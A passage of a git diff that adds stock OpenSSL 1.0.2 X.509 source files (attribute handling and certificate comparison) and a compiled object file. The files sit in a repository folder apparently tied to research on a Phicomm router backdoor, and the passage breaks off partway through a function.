+# define X509_R_UNABLE_TO_FIND_PARAMETERS_IN_CHAIN        107
+# define X509_R_UNABLE_TO_GET_CERTS_PUBLIC_KEY            108
+# define X509_R_UNKNOWN_KEY_TYPE                          117
+# define X509_R_UNKNOWN_NID                               109
+# define X509_R_UNKNOWN_PURPOSE_ID                        121
+# define X509_R_UNKNOWN_TRUST_ID                          120
+# define X509_R_UNSUPPORTED_ALGORITHM                     111
+# define X509_R_WRONG_LOOKUP_TYPE                         112
+# define X509_R_WRONG_TYPE                                122
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_att.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_att.c
new file mode 100644
index 0000000..bd59281
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_att.c
@@ -0,0 +1,384 @@
+/* crypto/x509/x509_att.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/stack.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+int X509at_get_attr_count(const STACK_OF(X509_ATTRIBUTE) *x)
+{
+    return sk_X509_ATTRIBUTE_num(x);
+}
+
+int X509at_get_attr_by_NID(const STACK_OF(X509_ATTRIBUTE) *x, int nid,
+                           int lastpos)
+{
+    ASN1_OBJECT *obj;
+
+    obj = OBJ_nid2obj(nid);
+    if (obj == NULL)
+        return (-2);
+    return (X509at_get_attr_by_OBJ(x, obj, lastpos));
+}
+
+int X509at_get_attr_by_OBJ(const STACK_OF(X509_ATTRIBUTE) *sk,
+                           ASN1_OBJECT *obj, int lastpos)
+{
+    int n;
+    X509_ATTRIBUTE *ex;
+
+    if (sk == NULL)
+        return (-1);
+    lastpos++;
+    if (lastpos < 0)
+        lastpos = 0;
+    n = sk_X509_ATTRIBUTE_num(sk);
+    for (; lastpos < n; lastpos++) {
+        ex = sk_X509_ATTRIBUTE_value(sk, lastpos);
+        if (OBJ_cmp(ex->object, obj) == 0)
+            return (lastpos);
+    }
+    return (-1);
+}
+
+X509_ATTRIBUTE *X509at_get_attr(const STACK_OF(X509_ATTRIBUTE) *x, int loc)
+{
+    if (x == NULL || sk_X509_ATTRIBUTE_num(x) <= loc || loc < 0)
+        return NULL;
+    else
+        return sk_X509_ATTRIBUTE_value(x, loc);
+}
+
+X509_ATTRIBUTE *X509at_delete_attr(STACK_OF(X509_ATTRIBUTE) *x, int loc)
+{
+    X509_ATTRIBUTE *ret;
+
+    if (x == NULL || sk_X509_ATTRIBUTE_num(x) <= loc || loc < 0)
+        return (NULL);
+    ret = sk_X509_ATTRIBUTE_delete(x, loc);
+    return (ret);
+}
+
+STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr(STACK_OF(X509_ATTRIBUTE) **x,
+                                           X509_ATTRIBUTE *attr)
+{
+    X509_ATTRIBUTE *new_attr = NULL;
+    STACK_OF(X509_ATTRIBUTE) *sk = NULL;
+
+    if (x == NULL) {
+        X509err(X509_F_X509AT_ADD1_ATTR, ERR_R_PASSED_NULL_PARAMETER);
+        goto err2;
+    }
+
+    if (*x == NULL) {
+        if ((sk = sk_X509_ATTRIBUTE_new_null()) == NULL)
+            goto err;
+    } else
+        sk = *x;
+
+    if ((new_attr = X509_ATTRIBUTE_dup(attr)) == NULL)
+        goto err2;
+    if (!sk_X509_ATTRIBUTE_push(sk, new_attr))
+        goto err;
+    if (*x == NULL)
+        *x = sk;
+    return (sk);
+ err:
+    X509err(X509_F_X509AT_ADD1_ATTR, ERR_R_MALLOC_FAILURE);
+ err2:
+    if (new_attr != NULL)
+        X509_ATTRIBUTE_free(new_attr);
+    if (sk != NULL)
+        sk_X509_ATTRIBUTE_free(sk);
+    return (NULL);
+}
+
+STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_OBJ(STACK_OF(X509_ATTRIBUTE)
+                                                  **x, const ASN1_OBJECT *obj,
+                                                  int type,
+                                                  const unsigned char *bytes,
+                                                  int len)
+{
+    X509_ATTRIBUTE *attr;
+    STACK_OF(X509_ATTRIBUTE) *ret;
+    attr = X509_ATTRIBUTE_create_by_OBJ(NULL, obj, type, bytes, len);
+    if (!attr)
+        return 0;
+    ret = X509at_add1_attr(x, attr);
+    X509_ATTRIBUTE_free(attr);
+    return ret;
+}
+
+STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_NID(STACK_OF(X509_ATTRIBUTE)
+                                                  **x, int nid, int type,
+                                                  const unsigned char *bytes,
+                                                  int len)
+{
+    X509_ATTRIBUTE *attr;
+    STACK_OF(X509_ATTRIBUTE) *ret;
+    attr = X509_ATTRIBUTE_create_by_NID(NULL, nid, type, bytes, len);
+    if (!attr)
+        return 0;
+    ret = X509at_add1_attr(x, attr);
+    X509_ATTRIBUTE_free(attr);
+    return ret;
+}
+
+STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_txt(STACK_OF(X509_ATTRIBUTE)
+                                                  **x, const char *attrname,
+                                                  int type,
+                                                  const unsigned char *bytes,
+                                                  int len)
+{
+    X509_ATTRIBUTE *attr;
+    STACK_OF(X509_ATTRIBUTE) *ret;
+    attr = X509_ATTRIBUTE_create_by_txt(NULL, attrname, type, bytes, len);
+    if (!attr)
+        return 0;
+    ret = X509at_add1_attr(x, attr);
+    X509_ATTRIBUTE_free(attr);
+    return ret;
+}
+
+void *X509at_get0_data_by_OBJ(STACK_OF(X509_ATTRIBUTE) *x,
+                              ASN1_OBJECT *obj, int lastpos, int type)
+{
+    int i;
+    X509_ATTRIBUTE *at;
+    i = X509at_get_attr_by_OBJ(x, obj, lastpos);
+    if (i == -1)
+        return NULL;
+    if ((lastpos <= -2) && (X509at_get_attr_by_OBJ(x, obj, i) != -1))
+        return NULL;
+    at = X509at_get_attr(x, i);
+    if (lastpos <= -3 && (X509_ATTRIBUTE_count(at) != 1))
+        return NULL;
+    return X509_ATTRIBUTE_get0_data(at, 0, type, NULL);
+}
+
+X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_NID(X509_ATTRIBUTE **attr, int nid,
+                                             int atrtype, const void *data,
+                                             int len)
+{
+    ASN1_OBJECT *obj;
+    X509_ATTRIBUTE *ret;
+
+    obj = OBJ_nid2obj(nid);
+    if (obj == NULL) {
+        X509err(X509_F_X509_ATTRIBUTE_CREATE_BY_NID, X509_R_UNKNOWN_NID);
+        return (NULL);
+    }
+    ret = X509_ATTRIBUTE_create_by_OBJ(attr, obj, atrtype, data, len);
+    if (ret == NULL)
+        ASN1_OBJECT_free(obj);
+    return (ret);
+}
+
+X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_OBJ(X509_ATTRIBUTE **attr,
+                                             const ASN1_OBJECT *obj,
+                                             int atrtype, const void *data,
+                                             int len)
+{
+    X509_ATTRIBUTE *ret;
+
+    if ((attr == NULL) || (*attr == NULL)) {
+        if ((ret = X509_ATTRIBUTE_new()) == NULL) {
+            X509err(X509_F_X509_ATTRIBUTE_CREATE_BY_OBJ,
+                    ERR_R_MALLOC_FAILURE);
+            return (NULL);
+        }
+    } else
+        ret = *attr;
+
+    if (!X509_ATTRIBUTE_set1_object(ret, obj))
+        goto err;
+    if (!X509_ATTRIBUTE_set1_data(ret, atrtype, data, len))
+        goto err;
+
+    if ((attr != NULL) && (*attr == NULL))
+        *attr = ret;
+    return (ret);
+ err:
+    if ((attr == NULL) || (ret != *attr))
+        X509_ATTRIBUTE_free(ret);
+    return (NULL);
+}
+
+X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_txt(X509_ATTRIBUTE **attr,
+                                             const char *atrname, int type,
+                                             const unsigned char *bytes,
+                                             int len)
+{
+    ASN1_OBJECT *obj;
+    X509_ATTRIBUTE *nattr;
+
+    obj = OBJ_txt2obj(atrname, 0);
+    if (obj == NULL) {
+        X509err(X509_F_X509_ATTRIBUTE_CREATE_BY_TXT,
+                X509_R_INVALID_FIELD_NAME);
+        ERR_add_error_data(2, "name=", atrname);
+        return (NULL);
+    }
+    nattr = X509_ATTRIBUTE_create_by_OBJ(attr, obj, type, bytes, len);
+    ASN1_OBJECT_free(obj);
+    return nattr;
+}
+
+int X509_ATTRIBUTE_set1_object(X509_ATTRIBUTE *attr, const ASN1_OBJECT *obj)
+{
+    if ((attr == NULL) || (obj == NULL))
+        return (0);
+    ASN1_OBJECT_free(attr->object);
+    attr->object = OBJ_dup(obj);
+    return (1);
+}
+
+int X509_ATTRIBUTE_set1_data(X509_ATTRIBUTE *attr, int attrtype,
+                             const void *data, int len)
+{
+    ASN1_TYPE *ttmp;
+    ASN1_STRING *stmp = NULL;
+    int atype = 0;
+    if (!attr)
+        return 0;
+    if (attrtype & MBSTRING_FLAG) {
+        stmp = ASN1_STRING_set_by_NID(NULL, data, len, attrtype,
+                                      OBJ_obj2nid(attr->object));
+        if (!stmp) {
+            X509err(X509_F_X509_ATTRIBUTE_SET1_DATA, ERR_R_ASN1_LIB);
+            return 0;
+        }
+        atype = stmp->type;
+    } else if (len != -1) {
+        if (!(stmp = ASN1_STRING_type_new(attrtype)))
+            goto err;
+        if (!ASN1_STRING_set(stmp, data, len))
+            goto err;
+        atype = attrtype;
+    }
+    if (!(attr->value.set = sk_ASN1_TYPE_new_null()))
+        goto err;
+    attr->single = 0;
+    /*
+     * This is a bit naughty because the attribute should really have at
+     * least one value but some types use and zero length SET and require
+     * this.
+     */
+    if (attrtype == 0)
+        return 1;
+    if (!(ttmp = ASN1_TYPE_new()))
+        goto err;
+    if ((len == -1) && !(attrtype & MBSTRING_FLAG)) {
+        if (!ASN1_TYPE_set1(ttmp, attrtype, data))
+            goto err;
+    } else
+        ASN1_TYPE_set(ttmp, atype, stmp);
+    if (!sk_ASN1_TYPE_push(attr->value.set, ttmp))
+        goto err;
+    return 1;
+ err:
+    X509err(X509_F_X509_ATTRIBUTE_SET1_DATA, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+int X509_ATTRIBUTE_count(X509_ATTRIBUTE *attr)
+{
+    if (!attr->single)
+        return sk_ASN1_TYPE_num(attr->value.set);
+    if (attr->value.single)
+        return 1;
+    return 0;
+}
+
+ASN1_OBJECT *X509_ATTRIBUTE_get0_object(X509_ATTRIBUTE *attr)
+{
+    if (attr == NULL)
+        return (NULL);
+    return (attr->object);
+}
+
+void *X509_ATTRIBUTE_get0_data(X509_ATTRIBUTE *attr, int idx,
+                               int atrtype, void *data)
+{
+    ASN1_TYPE *ttmp;
+    ttmp = X509_ATTRIBUTE_get0_type(attr, idx);
+    if (!ttmp)
+        return NULL;
+    if (atrtype != ASN1_TYPE_get(ttmp)) {
+        X509err(X509_F_X509_ATTRIBUTE_GET0_DATA, X509_R_WRONG_TYPE);
+        return NULL;
+    }
+    return ttmp->value.ptr;
+}
+
+ASN1_TYPE *X509_ATTRIBUTE_get0_type(X509_ATTRIBUTE *attr, int idx)
+{
+    if (attr == NULL)
+        return (NULL);
+    if (idx >= X509_ATTRIBUTE_count(attr))
+        return NULL;
+    if (!attr->single)
+        return sk_ASN1_TYPE_value(attr->value.set, idx);
+    else
+        return attr->value.single;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_att.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_att.o
new file mode 100644
index 0000000000000000000000000000000000000000..ec00853d4f342348ea71807cb82b65c0b8a4f6b3
GIT binary patch
literal 7912
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_cmp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_cmp.c
new file mode 100644
index 0000000..49c71b9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_cmp.c
@@ -0,0 +1,498 @@
+/* crypto/x509/x509_cmp.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+int X509_issuer_and_serial_cmp(const X509 *a, const X509 *b)
+{
+    int i;
+    X509_CINF *ai, *bi;
+
+    ai = a->cert_info;
+    bi = b->cert_info;
+    i = M_ASN1_INTEGER_cmp(ai->serialNumber, bi->serialNumber);
+    if (i)
+        return (i);
+    return (X509_NAME_cmp(ai->issuer, bi->issuer));
+}
+
+#ifndef OPENSSL_NO_MD5
+unsigned long X509_issuer_and_serial_hash(X509 *a)
+{
+    unsigned long ret = 0;
+    EVP_MD_CTX ctx;
+    unsigned char md[16];
+    char *f;
+
+    EVP_MD_CTX_init(&ctx);
+    f = X509_NAME_oneline(a->cert_info->issuer, NULL, 0);
+    if (!EVP_DigestInit_ex(&ctx, EVP_md5(), NULL))
+        goto err;
+    if (!EVP_DigestUpdate(&ctx, (unsigned char *)f, strlen(f)))
+        goto err;
+    OPENSSL_free(f);
+    if (!EVP_DigestUpdate
+        (&ctx, (unsigned char *)a->cert_info->serialNumber->data,
+         (unsigned long)a->cert_info->serialNumber->length))
+        goto err;
+    if (!EVP_DigestFinal_ex(&ctx, &(md[0]), NULL))
+        goto err;
+    ret = (((unsigned long)md[0]) | ((unsigned long)md[1] << 8L) |
+           ((unsigned long)md[2] << 16L) | ((unsigned long)md[3] << 24L)
+        ) & 0xffffffffL;
+ err:
+    EVP_MD_CTX_cleanup(&ctx);
+    return (ret);
+}
+#endif
+
+int X509_issuer_name_cmp(const X509 *a, const X509 *b)
+{
+    return (X509_NAME_cmp(a->cert_info->issuer, b->cert_info->issuer));
+}
+
+int X509_subject_name_cmp(const X509 *a, const X509 *b)
+{
+    return (X509_NAME_cmp(a->cert_info->subject, b->cert_info->subject));
+}
+
+int X509_CRL_cmp(const X509_CRL *a, const X509_CRL *b)
+{
+    return (X509_NAME_cmp(a->crl->issuer, b->crl->issuer));
+}
+
+#ifndef OPENSSL_NO_SHA
+int X509_CRL_match(const X509_CRL *a, const X509_CRL *b)
+{
+    return memcmp(a->sha1_hash, b->sha1_hash, 20);
+}
+#endif
+
+X509_NAME *X509_get_issuer_name(X509 *a)
+{
+    return (a->cert_info->issuer);
+}
+
+unsigned long X509_issuer_name_hash(X509 *x)
+{
+    return (X509_NAME_hash(x->cert_info->issuer));
+}
+
+#ifndef OPENSSL_NO_MD5
+unsigned long X509_issuer_name_hash_old(X509 *x)
+{
+    return (X509_NAME_hash_old(x->cert_info->issuer));
+}
+#endif
+
+X509_NAME *X509_get_subject_name(X509 *a)
+{
+    return (a->cert_info->subject);
+}
+
+ASN1_INTEGER *X509_get_serialNumber(X509 *a)
+{
+    return (a->cert_info->serialNumber);
+}
+
+unsigned long X509_subject_name_hash(X509 *x)
+{
+    return (X509_NAME_hash(x->cert_info->subject));
+}
+
+#ifndef OPENSSL_NO_MD5
+unsigned long X509_subject_name_hash_old(X509 *x)
+{
+    return (X509_NAME_hash_old(x->cert_info->subject));
+}
+#endif
+
+#ifndef OPENSSL_NO_SHA
+/*
+ * Compare two certificates: they must be identical for this to work. NB:
+ * Although "cmp" operations are generally prototyped to take "const"
+ * arguments (eg. for use in STACKs), the way X509 handling is - these
+ * operations may involve ensuring the hashes are up-to-date and ensuring
+ * certain cert information is cached. So this is the point where the
+ * "depth-first" constification tree has to halt with an evil cast.
+ */
+int X509_cmp(const X509 *a, const X509 *b)
+{
+    int rv;
+    /* ensure hash is valid */
+    X509_check_purpose((X509 *)a, -1, 0);
+    X509_check_purpose((X509 *)b, -1, 0);
+
+    rv = memcmp(a->sha1_hash, b->sha1_hash, SHA_DIGEST_LENGTH);
+    if (rv)
+        return rv;
+    /* Check for match against stored encoding too */
+    if (!a->cert_info->enc.modified && !b->cert_info->enc.modified) {
+        rv = (int)(a->cert_info->enc.len - b->cert_info->enc.len);
+        if (rv)
+            return rv;
+        return memcmp(a->cert_info->enc.enc, b->cert_info->enc.enc,
+                      a->cert_info->enc.len);
+    }
+    return rv;
+}
+#endif
+
+int X509_NAME_cmp(const X509_NAME *a, const X509_NAME *b)
+{
+    int ret;
+
+    /* Ensure canonical encoding is present and up to date */
+
+    if (!a->canon_enc || a->modified) {
+        ret = i2d_X509_NAME((X509_NAME *)a, NULL);
+        if (ret < 0)
+            return -2;
+    }
+
